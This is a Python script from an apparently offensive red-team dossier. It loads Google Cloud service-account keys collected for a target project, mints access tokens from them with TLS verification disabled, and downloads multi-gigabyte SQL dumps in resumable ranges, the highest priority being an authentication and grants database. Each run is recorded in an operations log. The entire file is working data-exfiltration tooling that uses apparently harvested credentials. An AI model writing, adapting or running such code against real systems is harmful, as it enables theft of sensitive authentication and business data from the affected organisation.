#!/usr/bin/env python3
"""Ranged/resumable download of huge GCS objects (operator GO 2026-08-18).

 authentication_online.sql (13GB) — priority (auth/grants data).
 reporting_product_update.sql (44.6GB) — secondary.

Uses HTTP Range chunks of 256MB with per-chunk retry and a resume sidecar
(<dest>.resume json storing next_byte + expected size + token mint time).
Re-mints SA token every 50min (GCS SA tokens live 1h).

Egress: storage.googleapis.com + oauth2.googleapis.com only.
Out: downloads/all/cfu-main-sql-migrate/ + OPLOG entry.
"""
import base64
import importlib.util
import json
import os
import socket
import ssl
import sys
import time
import urllib.parse
import urllib.request
from datetime import datetime, timezone
from pathlib import Path

socket.setdefaulttimeout(120)

ROOT = Path('/root/ir-assessment')
DOSSIER = ROOT / 'redteam/gitlab_pharmalink_id'
OUT = DOSSIER / 'downloads/all/cfu-main-sql-migrate'
OUT.mkdir(parents=True, exist_ok=True)

spec = importlib.util.spec_from_file_location('l2s', str(ROOT / 'redteam/l2_aug06_sweep.py'))
l2s = importlib.util.module_from_spec(spec)
spec.loader.exec_module(l2s)

CTX = ssl.create_default_context(); CTX.check_hostname = False; CTX.verify_mode = ssl.CERT_NONE

CHUNK = 256 * 1024 * 1024          # 256MB per range request
TOKEN_REFRESH_SEC = 50 * 60        # re-mint every 50 min
PROJ = 'cfu-main'

TARGETS = [
    ('golden-gate/authentication_online.sql', 13_020_000_000),   # ~13GB, exact size read from metadata at runtime
    ('colosseum/April_2025/reporting_product_update.sql', 44_560_000_000),
]


def oplog(msg, result):
    ts = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M')
    with open(DOSSIER / 'OPLOG.md', 'a') as f:
        f.write(f"{ts} | local | storage.googleapis.com:443 | urllib/GET alt=media ranged (256MB chunks, resumable) | download huge objects | {msg} | {result} | none | huge-fetch GO\\n")


def b64url(b):
    return base64.urlsafe_b64encode(b).rstrip(b'=')


def load_sa(project_id):
    for f in sorted((DOSSIER / 'gcp_keys').iterdir()):
        try:
            d = json.loads(f.read_text())
        except Exception:
            continue
        if isinstance(d, dict) and d.get('type') == 'service_account' and d.get('project_id') == project_id:
            return d
    return None


def mint(sa):
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import padding
    now = int(time.time())
    hdr = {'alg': 'RS256', 'typ': 'JWT', 'kid': sa['private_key_id']}
    cl = {'iss': sa['client_email'], 'scope': 'https://www.googleapis.com/auth/cloud-platform',
          'aud': 'https://oauth2.googleapis.com/token', 'iat': now, 'exp': now + 3600}
    si = b64url(json.dumps(hdr).encode()) + b'.' + b64url(json.dumps(cl).encode())
    key = serialization.load_pem_private_key(sa['private_key'].encode(), None)
    jwt = (si + b'.' + b64url(key.sign(si, padding.PKCS1v15(), hashes.SHA256()))).decode()
    data = urllib.parse.urlencode(
        {'grant_type': 'urn:ietf:params:oauth:grant-type:jwt-bearer', 'assertion': jwt}).encode()
    st, body = l2s.req('https://oauth2.googleapis.com/token', method='POST', data=data,
                       headers={'Content-Type': 'application/x-www-form-urlencoded'})
    return json.loads(body)['access_token']


def get_size(tok, bucket, name):
    enc = urllib.parse.quote(name, safe='')
    url = f'https://storage.googleapis.com/storage/v1/b/{bucket}/o/{enc}?fields=name,size'
    req = urllib.request.Request(url, headers={'Authorization': f'Bearer {tok}'})
    with urllib.request.urlopen(req, timeout=30, context=CTX) as r:
        d = json.loads(r.read().decode())
    return int(d['size'])


def fetch_range(tok, bucket, name, start, end, dest):
    """Fetch bytes [start,end] inclusive into dest (append mode)."""
    enc = urllib.parse.quote(name, safe='')
    url = f'https://storage.googleapis.com/download/storage/v1/b/{bucket}/o/{enc}?alt=media'
    req = urllib.request.Request(url, headers={
        'Authorization': f'Bearer {tok}',
        'Range': f'bytes={start}-{end}',
    })
    with urllib.request.urlopen(req, timeout=600, context=CTX) as resp, open(dest, 'ab') as f:
        while True:
            chunk = resp.read(1 << 20)
            if not chunk:
                break
            f.write(chunk)


def download_object(sa, bucket, name, approx_size):
    slug = name.replace('/', '__')
    dest = OUT / slug
    resume = OUT / (slug + '.resume')

    state = {'next_byte': 0, 'size': None, 'minted_at': 0, 'token': None}
    if resume.exists():
        try:
            state.update(json.loads(resume.read_text()))
        except Exception:
            pass

    # Mint token if missing or stale
    def ensure_token():
        if not state['token'] or (time.time() - state['minted_at']) > TOKEN_REFRESH_SEC:
            print(f'  [*] minting new SA token', file=sys.stderr)
            state['token'] = mint(sa)
            state['minted_at'] = time.time()

    ensure_token()

    # Get authoritative size
    real_size = get_size(state['token'], bucket, name)
    if state['size'] != real_size:
        state['size'] = real_size
        state['next_byte'] = 0
        if dest.exists():
            dest.unlink()
        print(f'  [*] {name} real size = {real_size/1e9:.2f} GB', file=sys.stderr)

    # If local file bigger than expected — restart
    if dest.exists() and dest.stat().st_size > state['size']:
        dest.unlink()
        state['next_byte'] = 0

    # If already complete, skip
    if dest.exists() and dest.stat().st_size == state['size']:
        print(f'  [=] {name} already complete ({state["size"]/1e9:.2f} GB)', file=sys.stderr)
        resume.unlink(missing_ok=True)
        return True

    # Sync next_byte with actual file size
    if dest.exists():
        state['next_byte'] = dest.stat().st_size

    total = state['size']
    print(f'  [*] start {name}: {state["next_byte"]/1e9:.2f}/{total/1e9:.2f} GB', file=sys.stderr)

    while state['next_byte'] < total:
        ensure_token()
        start = state['next_byte']
        end = min(start + CHUNK - 1, total - 1)
        t0 = time.time()
        try:
            fetch_range(state['token'], bucket, name, start, end, dest)
            new_size = dest.stat().st_size
            got = new_size - start
            expected = end - start + 1
            if got != expected:
                print(f'  [!] chunk mismatch: got {got}, expected {expected}', file=sys.stderr)
            state['next_byte'] = new_size
            resume.write_text(json.dumps(state))
            mb_s = (got / 1e6) / max(time.time() - t0, 0.01)
            pct = 100.0 * new_size / total
            print(f'  [+] {name[:50]} {new_size/1e9:.2f}/{total/1e9:.2f}GB ({pct:.1f}%) @ {mb_s:.1f}MB/s', file=sys.stderr)
        except Exception as e:
            print(f'  [-] chunk err @{start}: {type(e).__name__}: {e}', file=sys.stderr)
            # Re-mint and retry same chunk after short backoff
            state['token'] = None
            time.sleep(5)

    if dest.stat().st_size == total:
        resume.unlink(missing_ok=True)
        print(f'  [+] DONE {name}: {total/1e9:.2f} GB', file=sys.stderr)
        return True
    return False


def main():
    sa = load_sa(PROJ)
    if not sa:
        print('no cfu-main SA', file=sys.stderr); sys.exit(1)

    results = []
    for name, approx in TARGETS:
        print(f'[*] target: {name}', file=sys.stderr)
        t0 = time.time()
        try:
            ok = download_object(sa, PROJ and 'cfu-main-sql-migrate', name, approx)
            results.append({'name': name, 'ok': ok, 'sec': round(time.time() - t0, 1)})
        except Exception as e:
            results.append({'name': name, 'ok': False, 'error': f'{type(e).__name__}: {e}'})
            print(f'  [-] FATAL {name}: {e}', file=sys.stderr)

    ok_count = sum(1 for r in results if r.get('ok'))
    total_size = sum((OUT / r['name'].replace('/', '__')).stat().st_size
                     for r in results if r.get('ok'))
    oplog(f'results={results} ok={ok_count}/{len(results)} total={total_size/1e9:.2f}GB',
          'SUCCESS' if ok_count == len(results) else 'PARTIAL')
    print(f'[+] {ok_count}/{len(results)} complete, {total_size/1e9:.2f} GB downloaded', file=sys.stderr)


if __name__ == '__main__':
    main()
